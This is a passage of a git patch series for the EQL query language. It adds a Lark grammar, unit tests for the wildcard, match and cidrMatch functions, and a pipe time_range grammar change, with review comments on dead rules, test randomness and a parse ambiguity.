@@ -0,0 +1,110 @@ +definitions: definition* +?definition: macro | constant + +macro: "macro" name "(" [name ("," name)*] ")" expr +constant: "const" name EQUALS literal + +query_with_definitions: definitions piped_query +piped_query: base_query [pipes] + | pipes +base_query: sequence + | join + | event_query +event_query: [name "where"] expr +sequence: "sequence" [join_values with_params? | with_params join_values?] subquery_by subquery_by+ [until_subquery_by] +join: "join" join_values? subquery_by subquery_by+ until_subquery_by? +until_subquery_by.2: "until" subquery_by +pipes: pipe+ +pipe: "|" name [single_atom single_atom+ | expressions] + +join_values.2: "by" expressions +?with_params.2: "with" named_params +kv: name [EQUALS (time_range | atom)] +time_range: number name +named_params: kv ("," kv)* +subquery_by: subquery named_params? join_values? +subquery: "[" event_query "]" + + +// Expressions +expressions: expr ("," expr)* [","] +?expr: or_expr +?or_expr: and_expr ("or" and_expr)* +?and_expr: not_expr ("and" not_expr)* +?not_expr.3: NOT_OP* term +?term: sum_expr comp_op sum_expr -> comparison + | sum_expr "not" "in" "(" expressions [","]? ")" -> not_in_set + | sum_expr "in" "(" expressions [","]? ")" -> in_set + | sum_expr + +// Need to recover these tokens +EQUALS: "==" | "=" +COMP_OP: "<=" | "<" | "!=" | ">=" | ">" +?comp_op: EQUALS | COMP_OP +MULT_OP: "*" | "/" | "%" +NOT_OP: "not" + +method: ":" name "(" [expressions] ")" + + +?sum_expr: mul_expr (SIGN mul_expr)* +?mul_expr: named_subquery_test (MULT_OP named_subquery_test)* +?named_subquery_test: named_subquery + | method_chain +named_subquery.2: name "of" subquery +?method_chain: value (":" function_call)* +?value: SIGN? function_call + | SIGN? atom +function_call.2: name "(" [expressions] ")" +?atom: single_atom + | "(" expr ")" +?signed_single_atom: SIGN? 
single_atom +?single_atom: literal + | field + | base_field +base_field: name +field: FIELD +literal: number + | string +number: UNSIGNED_INTEGER + | DECIMAL +string: DQ_STRING + | SQ_STRING + | RAW_DQ_STRING + | RAW_SQ_STRING + +// Check against keyword usage +name: NAME + +// Tokens +// make this a token to avoid ambiguity, and make more rigid on whitespace +// sequence by pid [1] [true] looks identical to: +// sequence by pid[1] [true] +FIELD: NAME ("." WHITESPACE* NAME | "[" WHITESPACE* UNSIGNED_INTEGER WHITESPACE* "]")+ +LCASE_LETTER: "a".."z" +UCASE_LETTER: "A".."Z" +DIGIT: "0".."9" + +LETTER: UCASE_LETTER | LCASE_LETTER +WORD: LETTER+ + +NAME: ("_"|LETTER) ("_"|LETTER|DIGIT)* +UNSIGNED_INTEGER: /[0-9]+/ +EXPONENT: /[Ee][-+]?\d+/ +DECIMAL: UNSIGNED_INTEGER? "." UNSIGNED_INTEGER+ EXPONENT? + | UNSIGNED_INTEGER EXPONENT +SIGN: "+" | "-" +DQ_STRING: /"(\\[btnfr"'\\]|[^\r\n"\\])*"/ +SQ_STRING: /'(\\[btnfr"'\\]|[^\r\n'\\])*'/ +RAW_DQ_STRING: /\?"(\\\"|[^"\r\n])*"/ +RAW_SQ_STRING: /\?'(\\\'|[^'\r\n])*'/ + +%import common.NEWLINE + +COMMENT: "//" /[^\n]*/ +ML_COMMENT: "/*" /(.|\n|\r)*?/ "*/" +WHITESPACE: (" " | "\r" | "\n" | "\t" )+ + +%ignore COMMENT +%ignore ML_COMMENT +%ignore WHITESPACE diff --git a/tests/test_functions.py b/tests/test_functions.py new file mode 100644 index 0000000..b3a3676 --- /dev/null +++ b/tests/test_functions.py 
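Review bot: The rules `?signed_single_atom: SIGN? single_atom` and `WORD: LETTER+` are not referenced anywhere else in the visible grammar, so they appear to be dead definitions left over from the conversion from the EBNF; dropping them (or wiring `signed_single_atom` into `?value` where `SIGN? atom` is spelled out by hand) keeps the grammar honest about what it accepts. The comment `// Check against keyword usage` above `name: NAME` describes a check the grammar itself does not perform — `NAME` also matches `where`, `and`, `of` and the other keyword literals — so presumably the transformer rejects keywords used as identifiers; a one-line comment naming where that happens (e.g. `// keyword rejection is done in the transformer, not here`) would make the intent clear. `DECIMAL` uses `UNSIGNED_INTEGER+`, which is redundant since `UNSIGNED_INTEGER` is already `[0-9]+`.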
@@ -0,0 +1,180 @@ +"""Test Python Engine for EQL.""" +import random +import re +import unittest + +from eql.ast import String, Field +from eql.functions import Wildcard, Match, CidrMatch +from eql import types + + +class TestFunctions(unittest.TestCase): + """Direct tests for EQL functions.""" + + def test_mutli_line_functions(self): + """Test wildcard and match functions.""" + sources = [ + "this is a single line comment", + """This is + a multiline + comment""", + "this\nis\nalso\na\nmultiline\ncomment" + ] + + for source in sources: + self.assertTrue(Match.run(source, ".*comment")) + # \n newlines must match on \n \s etc. but won't match on " " + self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) + self.assertTrue(Match.run(source, "t.+a.+c.+")) + self.assertFalse(Match.run(source, "MiSsInG")) + + for source in sources: + self.assertTrue(Wildcard.run(source, "*comment")) + self.assertTrue(Wildcard.run(source, "this*is*comment")) + self.assertTrue(Wildcard.run(source, "t*a*c*")) + self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_cidr_match_validation(self): + """Check that invalid CIDR addresses are detected.""" + hints = [ + types.dynamic(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + ] + arguments = [ + Field("ip"), + String("10.0.0.0/8"), + String("b"), + String("192.168.1.0/24"), + ] + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + # test that missing / causes failure + arguments[2].value = "55.55.55.0" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + # test for invalid ip + arguments[2].value = "55.55.256.0/24" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + arguments[2].value = "55.55.55.0/24" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertIsNone(position) + + def test_cidr_match_rewrite(self): + """Test that cidrMatch() 
rewrites the arguments.""" + arguments = [ + Field("ip"), + String("10.0.0.0/8"), + String("172.169.18.19/31"), + String("192.168.1.25/24"), + ] + hints = [ + types.dynamic(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + ] + + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + self.assertEquals(position, None) + + # check that the original wasn't modified + self.assertIsNot(arguments[2], new_arguments[2]) + + # and that the values were set to the base of the subnet + self.assertEquals(new_arguments[2].value, "172.169.18.18/31") + self.assertEquals(new_arguments[3].value, "192.168.1.0/24") + + # test that /0 is working + arguments[2] = String("1.2.3.4/0") + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + + self.assertIsNot(arguments[2], new_arguments[2]) + + # and /32 + self.assertEquals(new_arguments[2].value, "0.0.0.0/0") + arguments[2] = String("12.34.45.56/32") + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + + self.assertIsNone(position) + + def test_cidr_ranges(self): + """Check that CIDR ranges are correctly identified.""" + cidr_range = CidrMatch.to_range("10.0.0.0/8") + self.assertListEqual(list(cidr_range), [ + (10, 0, 0, 0), (10, 255, 255, 255) + ]) + cidr_range = CidrMatch.to_range("123.45.67.189/32") + self.assertListEqual(list(cidr_range), [ + (123, 45, 67, 189), (123, 45, 67, 189) + ]) + + cidr_range = CidrMatch.to_range("0.0.0.0/0") + self.assertListEqual(list(cidr_range), [ + (0, 0, 0, 0), (255, 255, 255, 255) + ]) + + cidr_range = CidrMatch.to_range("192.168.15.2/22") + self.assertListEqual(list(cidr_range), [ + (192, 168, 12, 0), (192, 168, 15, 255) + ]) + + def test_octet_regex(self): + """Test that octet regex are correctly matching the range.""" + for _ in range(100): + # too many possible combos, so we can just randomly generate them + start = random.randrange(256) + end = random.randrange(256) + + 
# order them correctly + start, end = min(start, end), max(start, end) + + # now build the regex and check that each one matches + regex = re.compile("^(" + CidrMatch.make_octet_re(start, end) + ")$") + for num in range(500): + should_match = start <= num <= end + did_match = regex.match(str(num)) is not None + self.assertEquals(should_match, did_match) + + def test_cidr_regex(self): + """Test that octet regex are correctly matching the range.""" + for _ in range(200): + # make an ip address + ip_addr = ( + random.randrange(256), + random.randrange(256), + random.randrange(256), + random.randrange(256), + ) + size = random.randrange(33) + total_ips = 2 ** (32 - size) + + args = list(ip_addr) + args.append(size) + cidr_mask = "{:d}.{:d}.{:d}.{:d}/{:d}".format(*args) + + pattern = CidrMatch.make_cidr_regex(cidr_mask) + + regex = re.compile("^({})$".format(pattern)) + min_ip, max_ip = CidrMatch.to_range(cidr_mask) + + # randomly pick IPs that *are* in the range + for _ in range(min(200, total_ips)): + rand_addr = [random.randrange(mn, mx + 1) for mn, mx in zip(min_ip, max_ip)] + rand_ip = "{:d}.{:d}.{:d}.{:d}".format(*rand_addr) + + self.assertIsNotNone(regex.match(rand_ip)) + + # todo: pick IPs that are definitely not in the range + for _ in range(200): + rand_addr = [random.randrange(0, 255) for _ in range(4)] + in_subnet = all(mn <= o <= mx for o, mn, mx in zip(rand_addr, min_ip, max_ip)) + rand_ip = "{:d}.{:d}.{:d}.{:d}".format(*rand_addr) + + rv = regex.match(rand_ip) is not None + self.assertEquals(rv, in_subnet) From a1b5f53c463cbc5e93dcc73d56af8af530dbf2d6 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 4 Feb 2020 14:21:32 +0000 Subject: [PATCH 13/13] Updated grammar to support time_unit arg in pipe. --- eql/etc/eql.g | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/eql/etc/eql.g b/eql/etc/eql.g index af62bba..a868088 100644 --- a/eql/etc/eql.g +++ b/eql/etc/eql.g 
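Review bot: In `test_cidr_regex` the negative-sample loop draws octets with `random.randrange(0, 255)`, which never yields 255, so the top value of each octet — the boundary a range regex is most likely to get wrong — is never checked against `make_cidr_regex`; use `random.randrange(256)` as the other loops do. The RNG is never seeded, so a failing draw cannot be reproduced; add `random.seed(0)` at the start of the randomized tests or include the failing address in the assertion message. In `test_mutli_line_functions` (typo for "multi") the pattern `".*this\sis\s.*comment"` is a non-raw string containing `\s`, an invalid escape sequence that Python 3 warns on; write it as `r".*this\sis\s.*comment"`. `assertEquals` throughout this file is the deprecated alias of `assertEqual`.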
@@ -15,7 +15,7 @@ sequence: "sequence" [join_values with_params? | with_params join_values?] subqu
 join: "join" join_values? subquery_by subquery_by+ until_subquery_by?
 until_subquery_by.2: "until" subquery_by
 pipes: pipe+
-pipe: "|" name [single_atom single_atom+ | expressions]
+pipe: "|" name [single_atom single_atom+ | time_range | expressions]
 
 join_values.2: "by" expressions
 ?with_params.2: "with" named_params
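Review bot: The new `time_range` alternative overlaps the existing `single_atom single_atom+` branch: `time_range` is `number name`, and with whitespace ignored an argument such as `5 m` (or `5m`) is also a literal followed by a `base_field`, so both alternatives accept the same text and which tree is produced depends on the parser's ambiguity resolution rather than on the grammar. Order the branches so the intended parse comes first, `pipe: "|" name [time_range | single_atom single_atom+ | expressions]`, or give `time_range` an explicit priority, and add a parser test for `| window 5m` asserting the argument is a time range rather than two atoms. Anything downstream that assumes the first pipe argument is a time range will otherwise see an atom list on some inputs.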